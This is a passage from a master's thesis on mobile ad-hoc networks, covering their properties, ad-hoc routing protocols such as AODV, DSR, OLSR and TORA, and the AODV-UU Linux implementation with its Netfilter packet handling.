nodes equipped with wireless communication and networking capabilities, but lacking any pre-existing network infrastructure. Each node in the network acts both as a mobile host and a router, offering to forward traffic on behalf of other nodes within the network. For this traffic forwarding functionality, a routing protocol is needed. Figure 2.1: An example ad-hoc network. Each node acts both as a host and a router, forwarding traffic on behalf of other nodes. The term ad-hoc suggests that the network can take on different forms, suitable for the task at hand, which in turn implies that ad-hoc networks are of a highly adaptive nature. In the following sections, the properties and applications of ad-hoc networks are investigated further. 2.2 Properties of ad-hoc networks Perhaps the most important property of ad-hoc networks is that they do not rely on any pre-existing network infrastructure. Instead, these networks are formed in an on-demand fashion as soon nodes come sufficiently close to each other. This eliminates the need for stationary network components, such as routers and base stations, as well as cabling and central administration. Nodes in an ad-hoc network should offer to forward network traffic on behalf of other nodes. If they refuse to do so, the connectivity between nodes in the network is affected in a negative manner. The functionality and usefulness of an ad-hoc network heavily depends on this forwarding feature of participating nodes. Ad-hoc networks are often autonomous in the sense that they only offer connectivity between participating nodes, but no connectivity to external networks such as the Internet. In theory, however, nothing prevents a multi-homed node (with connections to both the ad-hoc network and one or more external networks) from acting as a gateway between those networks. The dynamic topology imposed by ad-hoc networks is another very important property. Since the topology is subject to frequent changes, due to node mobility and changes in the surrounding environment, special considerations have to be taken when routing protocols are selected for the nodes. Traditional routing protocols 3 13 such as OSPF [15] and RIP [16, 17] will fail to efficiently adapt to a dynamic topology of this kind, since frequent topology changes are not part of their normal operation. Therefore, special routing protocols are needed for ad-hoc networks. Differences in the radio transmitter and receiver equipment of nodes, such as different transmission ranges and reception sensitivities, may lead to uni-directional links which could complicate routing in the ad-hoc network. Furthermore, not only communications equipment may differ between nodes, but also other resources such as battery capacity, CPU capacity and the amount of memory available. As an effect, nodes in an ad-hoc network may have very different abilities to participate in the network, considering the amount of service that they are willing provide to other nodes. 2.3 Comparisons with wired networks Infrastructure A conventional network consists of a more or less fixed infrastructure, built of nodes, routers, switches, gateways, bridges, base stations and other network devices, all connected by wires. The main property of these networks is that their topologies are more or less fixed. Any wish to reconfigure the network or add network devices requires physical intervention, and possibly a loss of service to some or all of the nodes while these changes are carried out. Furthermore, the administration of these networks is often centralized, because many of the nodes in the network usually rely on central servers for storage, access and processing of data. Wireless networks in general and ad-hoc networks in particular can resolve some of these issues. Using wireless communication instead of fixed cabling solves the problem of cabling reconfiguration and the possible downtime caused by this. Ad-hoc networks add to this the ability of forming networks on-the-fly without any existing infrastructure. Ideally, the result is an on-demand network having all the advantages of wireless networks combined with virtually hassle-free setup and operation, as opposed to that of conventional, wired networks. Finally, since ad-hoc networks are formed by the nodes themselves, and the network topology may change rapidly, centralized solutions are not as common as in conventional networks Addressing In a conventional network, addresses and other network parameters are either manually assigned or handed out to nodes using special protocols, such as DHCP (Dynamic Host Configuration Protocol) [18]. The hardware address of the network interface can be checked by an address allocation entity (e.g. a DHCP server), and an IP address assigned to the node. In an ad-hoc network, the addressing issue becomes more complicated since there is no obvious, central authority in the network responsible for handing out addresses. Furthermore, there is no guarantee that the addresses taken by (or somehow assigned to) nodes reflect their geographical locations at all, due to node mobility Routing Routing in a conventional network is performed by special routers; either hardware-based routers specialized for this task, or computers equipped with several network interfaces and accompanying software to perform the actual routing. In an ad-hoc network, routing is instead carried out by the participating nodes themselves. Each node has the ability to forward traffic for others, and this ability is what makes it possible for traffic to flow through the ad-hoc network over multiple hops. Unlike a stationary router in a conventional network, an ad-hoc node does not need to be equipped with several network interfaces, since all communication is usually done through a single wireless channel. Another difference in ad-hoc network routing is that no subnetting assumptions are made, i.e., routing tables may end up consisting of separate IP addresses (which need not have any correlation with each other). As an effect, a flat addressing structure is imposed. In a conventional network, routing tables instead usually contain network prefixes not entire addresses paired with network interface identifiers. 4 14 2.4 Ad-hoc networking issues In this section, some of the practical problems encountered in wireless ad-hoc networks are presented along with proposed solutions found in literature and related research material. Since nodes in an ad-hoc network use wireless communication, many of the issues encountered in wireless LANs apply to ad-hoc networks as well Wireless medium access Since a mobile wireless ad-hoc network uses a wireless medium for data transmission, access to this medium must be controlled to prevent nodes from attempting to transmit data simultaneously. This control is provided by a MAC (Media Access Control) protocol, such as IEEE [34]. A well-known problem in this context is the hidden terminal problem. It occurs when two nodes, out of each others radio range, simultaneously try to transmit data to an intermediate node, which is in radio range of both the sending nodes. None of the sending nodes will be aware of the other node s transmission, causing a collision to occur at the intermediate node. This is shown in Figure 2.2. Sender Receiver Sender Figure 2.2: The hidden terminal problem. The sending nodes are unaware of each others transmissions, resulting in a collision at the receiving node. To avoid this problem, a handshake protocol could be used, such as the RTS-CTS handshake protocol. A node that wishes to send data is required to ask for permission before doing so, by sending a RTS (Request To Send) message to the receiving node. The receiving node then replies with a CTS (Clear To Send) message to grant this request. The CTS message can be heard by all nodes within radio range of the receiving node, and instructs them not to use the wireless medium since another transmission is about to take place. The node that requested the transmission can then begin sending data to the receiving node. This however does not provide a perfect solution to the hidden terminal problem. For instance, if RTS and CTS control messages collide at one of the nodes, that node will be unaware of both these messages. Since it believes that the channel is free to use, it could reply to future RTS messages from other nodes, causing a collision with the ongoing data transfer. Another problem in wireless medium access is the exposed node problem. It occurs when a node overhears another transmission and hence refrains to transmit any data of its own, even though such a transmission would not cause a collision due to the limited radio range of the nodes. This is shown in Figure 2.3. Clearly, the exposed node problem is leads to sub-optimal utilization of the wireless medium. Some proposed solutions are the usage of directional antennas (instead of omni-directional antennas) or separate channels for control messages and data [13]. Finally, a technique called transmission power control [11] could serve a dual purpose in this context. By adjusting the transmission power of nodes, interference can be reduced at the same time as nodes save valuable energy Addressing The issue of assigning unique identities to nodes in an ad-hoc network, e.g. in form of IP addresses, is another area of research. It is not obvious how such address allocations should be made, given the fact that mobile adhoc networks potentially could grow very large and the mobility of nodes may be very high. Proposed solutions 5 15 Data Figure 2.3: The exposed node problem. A node wishing to transmit data refrains to do so because it overhears an ongoing transmission. to the addressing problem can e.g. be found in [12], where nodes select their own IP addresses at random, and use ARP (Address Resolution Protocol) [14] for translating network hardware addresses into IP addresses and vice versa. Address collisions are detected by listening to ARP traffic from other nodes, spotting any attempts to use IP addresses that are already occupied. The addressing problem is one of the major problems restraining the usage of ad-hoc networks today, since all nodes need to be assigned unique addresses for any unicast packet transmission to take place. It is of great importance that this issue will be investigated further, to allow ad-hoc networks to be created on-the-fly as intended Network security Network security in ad-hoc networks is a concern of great importance. Transmission of sensitive data, forwarded by intermediate nodes whose intentions are unknown, may turn out to be unsuitable at best and fatal at worst. Countermeasures need to be taken to prevent unwanted exposure of sensitive information in the ad-hoc network. This could be achieved by using conventional encryption; however, key exchange techniques and public key infrastructure (PKI) solutions are harder to apply to ad-hoc networks, because of the lack of network infrastructure and authorities of trust. Network security could also be used for dealing with denial-of-service (DoS) or spoofing attacks against an ad-hoc network. For instance, security-enhanced versions of ad-hoc routing protocols could be used to ensure that the operation of the routing protocol (and hence, largely, the operation of the ad-hoc network) remains unaffected by attempts to forge or alter routing protocol control messages. A good overview of wireless ad-hoc network security issues can be found in [21], which covers topics such as trust, key management, secure routing, intrusion detection and availability, and also provides references to current research material. 2.5 Applications of ad-hoc networks Several applications of ad-hoc networks have been proposed. Some of the most common ones are: Spontaneous networks: Business colleagues or participants of a meeting could use an ad-hoc network for sharing documents, presentation material and notes on-the-fly. Disaster areas: In the event of a disaster, such as earthquake or fire, the existing network infrastructure may very well be out of order. Ad-hoc networks could be used by emergency personnel (police, medical staff, rescue coordinators, fire brigades etc.) for establishing an on-site communications network. As a result of this, valuable time can be saved in these situations, perhaps saving lives. Building of wireless networks: Ad-hoc networks could be used for building wireless networks where installation of network cabling is difficult, impossible or too expensive. Examples include ancient build- 6 16 ings that may not be modified, or are built in such a way that wiring becomes difficult. Mobile ad-hoc nodes could replace both conventional base stations and servers. Wireless sensor networks is another application of ad-hoc networks, where thousands or even ten thousands of electronic sensors populate the network. These sensors collect data and report to selected nodes at predetermined times or with certain intervals. The collected data can subsequently be used in larger computations, with the ultimate intention of generating overall statistics based on the large number of reports. Wireless sensor networks could be used in the military (e.g. for determining if an area is safe in terms of radiation), but also in everyday applications such as quality control and gathering of weather information. 2.6 Conclusions To conclude, ad-hoc networks possess special properties that make them attractive, but these properties come at a certain cost, e.g. in terms of network security. It is up to the participants of such a network (i.e., the nodes) to decide if they are willing to pay this price, given a specific task at hand. Hopefully, future research in ad-hoc networking will solve some of the practical issues that these networks are facing right now. In pace with the increased mobility of users, ad-hoc networks certainly have the potential to become very useful and popular. 7 17 Chapter 3 Ad-hoc Routing Protocols 3.1 Introduction For a packet to reach its destination in an ad-hoc network, it may have to travel over several hops. The main purpose of a routing protocol is to set up and maintain a routing table, containing information on where packets should be sent next to reach their destinations. Nodes use this information to forward packets that they receive. In this chapter, the need for ad-hoc routing protocols is discussed, and some ad-hoc routing protocols are described. The intention is not to present all existing protocols, nor to provide full technical details, but rather to describe the main ideas behind some of them and how they work. For this master s thesis, the AODV routing protocol (described in section 3.6.3) is of particular interest. 3.2 The need for ad-hoc routing protocols Routing is not a new issue in computer networking. Link-state routing (e.g. OSPF [15]) and distance vector routing (e.g. RIP [16, 17]) have existed for a long time and are widely used in conventional networks. However, they are not very suitable for use in mobile ad-hoc networks, for a number of reasons: They were designed with a quasi-static topology in mind. In an ad-hoc network, with a frequently changing network topology, these routing protocols may fail to converge, i.e., to reach a steady state. They were designed with a wired network in mind. In such a network, links are assumed to be bidirectional. In mobile ad-hoc networks, this is not always the case; differences in wireless networking hardware of nodes or radio signal fluctuations may cause uni-directional links, which can only be traversed in one direction. They try to maintain routes to all reachable destinations. In mobile ad-hoc networks with a very large number of nodes, such as a large wireless sensor networks, this may become infeasible because of the resulting very large number of routing entries. In mobile ad-hoc networks, periodic flooding of routing information is relatively expensive, since all nodes compete for access to the wireless medium (which usually offers a rather limited amount of bandwidth). Therefore, special routing protocols are needed for ad-hoc networks. 3.3 Classification of ad-hoc routing protocols Ad-hoc routing protocols are usually classified by the approach they use for maintaining and updating their routing tables. The two main approaches are: 8 18 Proactive (table-driven) operation: In this approach, the routing protocol attempts to maintain a routing table with routes to all other nodes in the network. Changes in the network topology are propagated by means of updates throughout the entire network to ensure that all nodes share a consistent view of the network. The advantage of this approach is that routes between arbitrary source - destination pairs are readily available, all the time. The disadvantages are that the routing tables will occupy a large amount of space if the network is large, and that the updates may lead to inefficient usage of network resources if they occur too frequently. Reactive (on-demand-driven) operation: In this approach, routes to a destination are acquired by a route discovery process in an on-demand fashion, i.e., a route is not searched for unless it is needed. The acquired route is maintained by a route maintenance process until it has been determined that the route is not needed anymore, or has become invalid. The advantage of this approach is that unnecessary exchange of route information is avoided, leaving more network resources available for other network traffic. The disadvantage is that route look-ups could take some time. Depending on the application, this may or may not be acceptable. There also exist hybrid approaches, combining both the proactive and the reactive approach. A more finegrained classification of ad-hoc routing protocols and a taxonomy for comparing them can be found in [33]. 3.4 Properties of ad-hoc routing protocols As mentioned previously, the characteristics of ad-hoc networks call for routing protocols specifically made for these networks. According to [20], some desirable properties of ad-hoc routing protocols are the following: Distributed operation: This is essential to mobile ad-hoc networks. Since the mobile ad-hoc network does not rely on any pre-existing infrastructure, its operation should be distributed and decentralized. Loop-freedom: This is usually desired, although may not be strictly required. Ensuring loop-freedom could help avoiding worst-case scenarios, such as packets looping within the network for arbitrary periods of time. Demand-based (reactive) operation: Instead of maintaining routing tables with information on routes between all nodes in the network, the routing protocol should find routes as they are needed. This avoids wasting bandwidth of the network. Proactive operation: This is the opposite of reactive operation. If the overhead of searching routes on an on-demand basis is unacceptable for the application, and the resources of the network (e.g. bandwidth) and its nodes (e.g. energy constraints) allow for it, proactive operation could be desired instead. Security: It is desirable that the routing protocol has the ability to utilize security techniques to prohibit disruption or modification of the operation of the protocol. Sleep period operation: Since nodes in a mobile ad-hoc network usually have a limited amount of energy (e.g. battery power), it is desirable that the routing protocol has the ability to cope with situations where nodes may have powered themselves off temporarily to save energy. Support for uni-directional links: Since there is no guarantee that links are bi-directional in a mobile adhoc network, the ability to use separate uni-directional links in both directions to replace a bi-directional link could be of great value, should such a situation occur. 9 19 3.5 The IETF MANET working group Specifications for many existing ad-hoc routing protocols have been developed by the IETF (Internet Engineering Task Force) working group MANET [1], a working group focusing on mobile ad-hoc networks. Their near-term goal is to standardize one or more intra-domain unicast routing protocols, and currently, they have published drafts for the following nine ad-hoc routing protocols: AODV (Ad hoc On-demand Distance Vector) [7] DSR (Dynamic Source Routing) [23] ZRP (Zone Routing Protocol) [24] OLSR (Optimized Link State Routing) [25] LANMAR (Landmark Routing Protocol) [26] FSR (Fisheye State Routing) [27] IERP (Interzone Routing Protocol) [28] IARP (Intrazone Routing Protocol) [29] TBRPF (Topology Broadcast based on Reverse-Path Forwarding) [30] In addition to developing routing protocol specifications, the MANET working group also serves as a meeting place and forum for discussions on mobile ad-hoc networking issues in general. As such, it has become an extremely valuable resource for researchers and developers in this area. 3.6 Examples of ad-hoc routing protocols In this section, some ad-hoc routing protocols are presented. Focus is put on how they work and their suitability given different network and mobility conditions, as this is important for their deployment in an ad-hoc network DSDV Although perhaps somewhat outdated, DSDV has influenced many other ad-hoc routing protocols. It is included here as a reference. Description DSDV (Destination-Sequenced Distance-Vector) [22] is a proactive ad-hoc routing protocol that is based on the distributed Bellman-Ford routing algorithm [19, pp ]. The classical count-to-infinity problem of Bellman-Ford is avoided by using sequence numbers, allowing nodes to distinguish between stale and new routes and ensuring loop-freedom. Operation Since DSDV is a proactive routing protocol, each node maintains a routing table with all other destinations in the network listed along with the next hop and the number of required hops to reach each destination. Routing table updates in DSDV are distributed by two different types of update packets: Full dump: This type of update packet contains all routing information available at a node. As a consequence, it may require several NPDUs (Network Protocol Data Units) to be transferred if the routing table is large. Full dump packets are transmitted infrequently if the node only experiences occasional movement. 10 20 Incremental: This type of update packet contains only the information that has changed since the latest full dump was sent out by the node. Hence, incremental packets only consume a fraction of the network resources compared to a full dump. Broadcasts of route information contain the destination address, the number of hops required to reach the destination (the cost metric), the highest sequence number known of that destination and another sequence number, unique to each broadcast. Nodes receiving such a broadcast will update their routing tables if the destination sequence number is greater than the existing one, or if it equals the existing one but the number of hops to reach the destination is smaller. New routes will immediately be advertised to a node s neighbors, and updated routes will cause an advertisement to be scheduled for transmission within a certain settling time. For its operation, DSDV requires the values of three parameters to be set: The incremental update period The full update period The settling time for routes The values of these parameters largely determine the performance of DSDV, and must be chosen carefully. Research, such as in [2] and [3], indicates that DSDV experiences low throughput and fails to converge as node mobility increases. Therefore, the DSDV protocol is probably best used in ad-hoc networks where node mobility is low or moderate OLSR Description OLSR (Optimized Link State Routing) [25] is another proactive ad-hoc routing protocol. It is an optimization of the classical link state algorithm [19, pp ] tailored to mobile wireless LANs. The key concept of OLSR is that of multipoint relays (MPRs). Multipoint relays are selected nodes that broadcast messages during the flooding process. This approach reduces the number of control messages transmitted over the network. In addition, the control messages of OLSR contain less information than those of the classical link state algorithm, limiting the amount of overhead even further. OLSR provides optimal routes in terms of number of hops and is supposed to be particularly suitable for large and dense networks. It works independently from other protocols, and makes no assumptions about the underlying link layer. Operation Each node selects a set of multipoint relays (MPRs) among its neighbors, such that the set covers all nodes that are two hops away in terms of radio range. Also, each node keeps information about the set of neighbors which have selected it as one of their MPRs. This information is obtained from periodic HELLO messages. (Periodic HELLO messages are used for neighbor sensing in OLSR, since the protocol does not make any assumptions about the underlying link layer.) Routes are established through the selected MPRs of a node. This means that a path to a destination is a series of hops through MPRs, from the source to the destination. Since OLSR is a proactive protocol, routes are immediately available when needed. Changes in connectivity cause link state information to be broadcasted by a node. This information is then re-broadcasted by the other nodes in that node s MPR set only, reducing the number of messages required to flood the information throughout the network. Also, the link state information broadcasted by a node contains only the state of links to nodes in its MPR set, not all its neighbors. This is sufficient, since each two-hop neighbor of a node is a one-hop neighbor of some node in the MPR set. 11 21 Summary OLSR is an attractive proactive routing protocol suitable for large and dense ad-hoc networks. One of its benefits is that it does not make any assumptions about the underlying link layer, allowing it to be used in a variety of configurations. Neighbor sensing is performed by periodic beaconing rather than link layer feedback. If route acquisition time is important to the application, the ad-hoc network is large and/or dense and traffic is exchanged between a large number of nodes, OLSR could be a suitable choice AODV Description AODV (Ad hoc On-demand Distance Vector) [7] is a reactive ad-hoc routing protocol utilizing destination sequence numbers to ensure loop-freedom at all times and to avoid the count-to-infinity problem associated with classical distance-vector protocols. It offers low overhead, quick adaptation to dynamic link conditions and low processing and memory overhead. Message types AODV defines three different message types for routing protocol control packets: Route Request (RREQ) Route Reply (RREP) Route Error (RERR) Route discovery Since AODV is a reactive protocol, routes to destinations are acquired in an on-demand manner. When a node needs a route to a destination, it broadcasts a RREQ message. As this message is spread throughout the network, each node that receives it sets up a reverse route, i.e., a route towards the requesting node. As soon as the RREQ message reaches a node with a fresh enough route to the specified destination, or the destination itself, a RREP unicast message is sent back to the requesting node. Intermediate nodes use the reverse routes created earlier for forwarding RREP messages. If intermediate nodes reply to all transmissions of a given RREQ message, the destination node being searched for never learns about a route back to the requesting node, as it never receives the RREQ. This could cause the destination node to initiate a route discovery of its own, if it needs to communicate with the requesting node (e.g. to reply to a TCP connection request). To solve this, the originator of a RREQ message should set a gratuitous RREP flag in the RREQ if it believes that this situation is likely to occur. An intermediate node receiving a RREQ with this flag set and replying with a RREP must also unicast a gratuitous RREP to the destination node. This allows the destination node to learn a route back to the requesting node. Routing table information Each routing table entry maintained by AODV contains the following fields: Destination IP Address Destination Sequence Number Valid Destination Sequence Number Interface Hop Count (number of hops needed to reach the destination) 12 22 Next Hop List of Precursors (described below) Lifetime (expiration or deletion time of the route) Routing Flags State (valid or invalid) Route maintenance Nodes monitor the link status of the next hop in active routes, i.e., routes whose entries are marked as valid in the routing table. This can be done by observing periodic broadcasts of HELLO messages (beacons) from other nodes, or any suitable link layer notifications, such as those provided by IEEE [34]. When a link failure is detected, a list of unreachable destinations is put into a RERR message and sent out to neighboring nodes, called precursors, that are likely to use the current node as their next hop towards those destinations. For this purpose, nodes maintain a precursor list for each routing table entry. Finally, routes are only kept as long as they are needed. If a route is not used for a certain period of time, its corresponding entry in the routing table is invalidated and subsequently deleted. Summary AODV is currently one of the most popular ad-hoc routing protocols and has enjoyed numerous reviews (e.g. in [2], [3] and [35]). These indicate that AODV performs very well both during high mobility and high network traffic load, making it one of the most interesting candidates among today s ad-hoc routing protocols. Several independent AODV implementations exist, such as AODV-UU [6] and Mad-hoc AODV [38] DSR Description DSR (Dynamic Source Routing) [23] is a reactive ad-hoc routing protocol based on source routing. Source routing means that each packet contains in its header an ordered list of addresses through which the packet should pass on its way to the destination this source route is created by the node that originates the packet. The usage of source routing trivially allows routing of packets to be loop-free, avoids the need for keeping up-to-date routing information in intermediate nodes and allows nodes that overhear packets containing source routes to cache this information for their own future use. Route discovery A node that wishes to send a packet to a destination checks in its route cache if it has a route available. If no route is found in the route cache, route discovery is initiated. The node initiating the route discovery broadcasts a Route Request packet, containing its own address, the destination (target) address and a unique request identification. Each Route Request also contains an initially empty list of nodes through which this particular Route Request packet has passed. If a node receives such a Route Request and discovers that it is the target of the request, it responds with a Route Reply back to the initiator of the Route Request. The Route Reply contains an copy of the accumulated route record from the Route Request. If a node receiving a Route Request instead discovers that it is not the target of the request, it appends its own address to the route record list of the Route Request, and re-broadcasts the Route Request (with the same request identification). Route Replies are sent back to the Route Request initiator using a route found in the route cache of the replying node. If no such route exists, the replying node should itself initiate a route discovery to find a route back to the originator of the original Route Request (and piggyback its Route Reply, to avoid possible infinite 13 23 recursion of route discoveries). However, if the replying node uses a MAC protocol that requires bi-directional links, such as IEEE [34], the node replying to the initiator s Route Request should instead reverse the route found in the Route Request, and use that route for its Route Reply. This ensures that the discovered route is bi-directional, and eliminates the need for an additional route discovery. Finally, when the initiator of a Route Request receives the Route Reply, it caches the route in its route cache and uses it for sending subsequent packets to that destination. Route maintenance If a route in the route cache is found to be broken by link-layer notifications, lack of passive acknowledgements, lack of network-layer acknowledgements or reception of packets containing Route Error information the node should remove the broken route from its route cache and send a Route Error to each node that has sent a packet routed over that link since an acknowledgement was last received. In addition, the node should notify the original senders of any affected pending packets by sending a Route Error to them, and try to salvage the pending packets. Salvaging can be done by examining the node s route cache for additional routes to the same destination and replacing the source route with a valid one. If no such alternative routes exist, the pending packets are discarded. Summary The many caching features found in DSR and its techniques for detecting and utilizing uni-directional links (if the underlying link layer can cope with those) makes it attractive for many ad-hoc networking configurations. However, the source routing approach comes at the cost of increased overhead, since each packet must carry the complete path to its destination in its packet header. Simulation studies such as [2] and [3] indicate that DSR works very well when network traffic loads are moderate, and that high mobility does not pose any particular problems. The number of control packets sent by DSR is generally much lower than for e.g. AODV with HELLO messages, but the byte overhead is larger because of the source routes contained in packets TORA Description TORA (Temporally-Ordered Routing Algorithm) [31] is a reactive ad-hoc routing protocol based on link reversal algorithms. It offers distributed operation, i.e., routers only need to maintain information about adjacent routers, and prevents long-lived loops. It minimizes communication overhead by localizing the algorithmic reaction to network topology changes, and also offers proactive operation as an option. For each destination, TORA builds and maintains a directed acyclic graph (DAG) which is used for routing packets to that destination. By associating heights with each node in the network and adjusting these as necessary, packets always flow downstream on their way to the destination. If a link breaks, the heights of nodes can be adjusted by link reversal algorithms to allow the direction of the link to be reversed. Requirements For its operation, TORA requires IMEP (Internet MANET Encapsulation Protocol) [32], a protocol designed specifically to support the operation of mobile ad-hoc network routing protocols. The IMEP features of specific interest to TORA are reliable, ordered broadcasts for its distributed operation, link and network layer address resolution and mapping, security authentication and (preferrably) link status sensing to avoid beaconing for node presence indication. Route creation In reactive mode, routes are created as needed. The two packet types used for this are Query (QRY) packets and Update (UPD) packets. A node initiates the route creation process by sending a QRY packet to its neighbors, 14 24 containing the identifier of the destination for which a route is requested. The QRY packet is propagated by neighboring routers until it is received by a router that has a trusted route to the destination, which will reply with a UPD packet indicating its height. On its way back to the node that initiated the route discovery, the UPD packet will cause routers to adjust their heights to be larger than the height specified in the UPD packet. Each router forwarding such a UPD packet will include their new height in the UPD packet, allowing the requested route to be created as a downstream route from the requesting node to the destination. In proactive mode, the node initiating the route discovery instead sends an OPT (Optimization) packet that is processed and forwarded by neighboring routers. The OPT packet allows routers to change their mode of operation to proactive operation, but otherwise has the same purpose as a QRY packet. Route maintenance Maintenance of routes is performed by reacting to topological changes in the network, such that routes to the destination are re-established within a finite amount of time. When a node detects a link failure, it adjusts its height to a local maximum with respect to the failed link. It then broadcasts a UPD packet to its neighbors. However, a route failure is not propagated until a node loses its last downstream link. If network partitioning is detected by a node, all links in that partition are marked as undirected to erase invalid routes. This is performed by sending Clear (CLR) packets to all neighbors. After such a partitioning, nodes will have to re-initiate the route discovery process when they require a route to a destination. Summary TORA uses a rather unique link reversal approach for solving the problem of routing in ad-hoc networks. However, its underlying requirements, i.e., the usage of IMEP, has proven to be a considerable source of overhead. Simulations in [2] indicate that this amount of overhead may grow so large that TORA effectively suffers a congestive collapse when the number of nodes reaches 30; contention of the wireless medium results in collisions which in turn make the situation even worse, fooling the IMEP protocol to erroneously believe that links are breaking. Therefore, TORA is probably best suited for small or moderately large ad-hoc networks. 3.7 Conclusions From the examples of ad-hoc routing protocols presented in this chapter, it should be evident that the selection of an ad-hoc routing protocol for use in an ad-hoc network requires careful thought. Parameters such as network size, mobility and traffic load all have an impact on the suitability of each protocol. This, together with the spontaneous nature of ad-hoc networks, easily turns the selection of a routing protocol into a complicated task. Possibly, the ongoing work of the IETF MANET working group [1] to promote a few of the existing ad-hoc routing protocol specifications to experimental RFCs could be of help, but it is too early to tell. 15 25 Chapter 4 AODV-UU This chapter provides a technical overview of AODV-UU. The main focus is put on its software modules and packet handling, as this is crucial for its operation and for the porting of AODV-UU to the ns-2 network simulator described in Chapter Introduction AODV-UU [6] is a Linux implementation of the AODV (Ad hoc On-demand Distance Vector) [7] routing protocol, developed at Uppsala University, Sweden. It runs as a user-space daemon, maintaining the kernel routing table. AODV-UU was written in the C programming language and has been released under the GNU General Public License (GPL). AODV-UU implements all mandatory and most optional features of AODV. One of the main goals of AODV-UU was to supply an AODV implementation that complied with the latest draft not older versions and this goal is upheld by continuous software development. New users of AODV-UU will appreciate its easy installation, stability and ease of use. The system requirements of AODV-UU are rather modest. A recent Linux distribution with a version 2.4.x kernel along with a wireless network card suffices (it is also possible to use a wired networking setup). In addition, AODV-UU can be cross-compiled for the ARM platform so that it can be used on many popular PDAs, e.g. the COMPAQ ipaq and the Sharp Zaurus. The version of AODV-UU described in this chapter is version 0.5, which complies with version 10 of the AODV draft. The complete source code is available from the AODV-UU homepage [6]. 4.2 Installation and usage Installation of AODV-UU is very straightforward. Compilation is handled by the UNIX make utility and a corresponding Makefile for AODV-UU, resulting in a user-space routing daemon (aodvd) and a kernel module (kaodv.o). The Makefile also offers a target to install the kernel module on the system. When installed, the kernel module is automatically loaded by the modprobe module loading system as soon as it is needed. To run AODV-UU, one executes the routing daemon (and optionally detaches it from the console). From there, the operation of AODV-UU should be more or less transparent. During execution, the AODV-UU routing daemon will log relevant events to a logfile if logging has been enabled. Also, if routing table logging has been enabled, the routing table will be periodically dumped to a routing table logfile. These two logfiles are useful for analyzing the behavior of AODV-UU, e.g. for post-run analysis of ad-hoc networking experiments, but can also help gaining understanding of AODV operation in general. 16 26 4.3 Configuration AODV-UU offers many options for adjusting its operation. These are supplied as parameters on the command line to the aodvd routing daemon. The following options are available: Daemon mode (-d, --daemon): Allows detaching of the routing agent from the console, i.e., transparent execution in the background. Force gratuitous (-g, --force-gratuitous): Forces the gratuitous flag to be set on all RREQs. Gratuitous RREQs are described in Section Help (-h, --help): Displays help information. Interface (-i, --interface): Specifies which network interfaces that AODV-UU should be attached to. The default is the first wireless network interface. HELLO jittering (-j, --hello-jitter): Disables jittering of HELLO messages. Logging (-l, --log): Enables logging to an AODV-UU logfile. Routing table logging (-r N, --log-rt-table N): Logs the contents of the routing table to a routing table logfile every N seconds. N HELLOs (-n N, --n-hellos N): Requires N HELLO messages to be received from a node before it is treated as a neighbor. Uni-directional hack (-u, --unidir-hack): Enables detection and avoidance of uni-directional links. This is an experimental feature. Gateway mode (-w, --gateway-mode): Enables Internet gateway support. This is an experimental feature. Disabling of expanding ring search (-x, --no-expanding-ring): Disables the expanding ring search for RREQs, which is normally used for limiting the dissemination of RREQs in the network. No wait-on-reboot (-D, --no-worb): Disables the 15-second wait-on-reboot delay at startup. Version information (-V, --version): Displays version and copyright information. Those features of AODV-UU that are marked as experimental are not guaranteed to work, and may disappear in any future release. Therefore, they should be used with caution. 4.4 Interaction with IP Since AODV is a reactive protocol, route acquisition is done on demand. This requires the routing protocol implementation to be able to intercept requests for destinations to which a valid route does not exist. Furthermore, the timeout-based removal of stale routing table entries requires support for monitoring of packets at each host. Early AODV implementations such as Mad-hoc AODV [38] and the implementation described by Larsson and Hedman in [35] were unable to intercept and temporarily delay packets for which a route did not exist, causing initial connection attempts to a previously unknown node to fail. The temporary work-around was to require the user to manually generate some arbitrary initial traffic to that node for route establishment to take place. This hindered transparent operation of connection-oriented protocols such as TCP, where initial packets are vital for connection setup. Since then, packet handling support in Linux has been vastly improved. Most notably, a software framework called Netfilter has been developed, allowing very flexible packet handling to be performed. AODV-UU uses Netfilter for all its packet processing and modification needs. 17 27 4.4.1 The Netfilter framework Netfilter [36] is a Linux kernel framework for mangling packets. For each network protocol, certain hooks are defined. These hooks correspond to well-defined places in the protocol stack and allow custom packet mangling code to be inserted in form of kernel modules. Figure 4.1 illustrates this for the IP protocol. To Transport Layer Outgoing packets NF_IP_LOCAL_IN Network Layer (IP) NF_IP_LOCAL_OUT NF_IP_FORWARD custom code NF_IP_PRE_ROUTING forwarding kernel routing kernel routing NF_IP_POST_ROUTING Incoming packets To Data Link Layer Figure 4.1: Netfilter hooks for IP. Packets delivered on these hooks can be captured and modified by custom code segments (kernel modules). Each packet arriving at such a hook is delivered to the code segments that have registered themselves on that hook. This allows packets to be altered, dropped or re-routed by these custom code segments. When a packet has been processed (and possibly modified), a verdict should be returned to Netfilter. This verdict instructs Netfilter to perform some packet-related action, e.g. to drop the packet or to let it continue its traversal through the protocol stack. Netfilter also offers the ability to process packets in user-space. By returning a special queue verdict, packets are queued in kernel space and information about the packet is sent to user-space over a netlink socket. Queued packets remain queued until the user-space application, at the other end of the socket, returns verdicts indicating the desired actions for these packets. In AODV-UU, a kernel module component constantly listens to both inbound and outbound packets by registering itself on the appropriate Netfilter hooks. Packets are queued as needed to allow user-space packet processing to be performed by the AODV-UU routing daemon. This allows the on-demand route acquisition and operation of AODV to be realized. Finally, the Netfilter approach allows the implementation to stay independent of kernel modifications. This is a big advantage in terms of software maintenance Performance The user-space packet processing comes at a certain performance penalty, but this has not been a major concern during the development of AODV-UU. Instead, the developers have aimed for stability and completeness of 18 28 features. Current experience estimates the additional delay caused by user-space processing to be roughly one millisecond for a one-hop round-trip packet. 4.5 Software modules AODV-UU consists of a variety of software modules, i.e., C source code files (.c) with corresponding header files (.h). Also, some header files constitute placeholders for definitions (constants and macros) only. In the following subsections, the software modules are divided into kernel-related and non-kernel-related modules, and each module is described individually. The intention is to summarize the functionality contained in the source code, as an initial step towards the porting of AODV-UU to the ns-2 network simulator described in Chapter Non-kernel-related modules aodv_hello.{c, h} This module contains HELLO message functionality. It offers generation and sending of HELLO messages, scheduling of HELLO message generation, processing of HELLO messages, and forced processing of a message as if it were a HELLO message (to extract neighbor information). It should be noted that HELLO messages in fact are RREP messages with their fields set to special values. Neighbor set extraction is performed through reading special AODV message extensions, i.e., additional information contained within an AODV message. aodv_rerr.{c, h} This module contains RERR message functionality. It defines a datatype for RERR messages and unreachable destinations, and offers RERR message creation, addition of unreachable destinations to RERR messages and processing of RERR messages. aodv_rrep.{c, h} The aodv_rrep module contains RREP message functionality. It defines the datatypes for RREP and RREP- ACK messages. The latter are used for acknowledgment of RREP messages, if the link over which the RREP 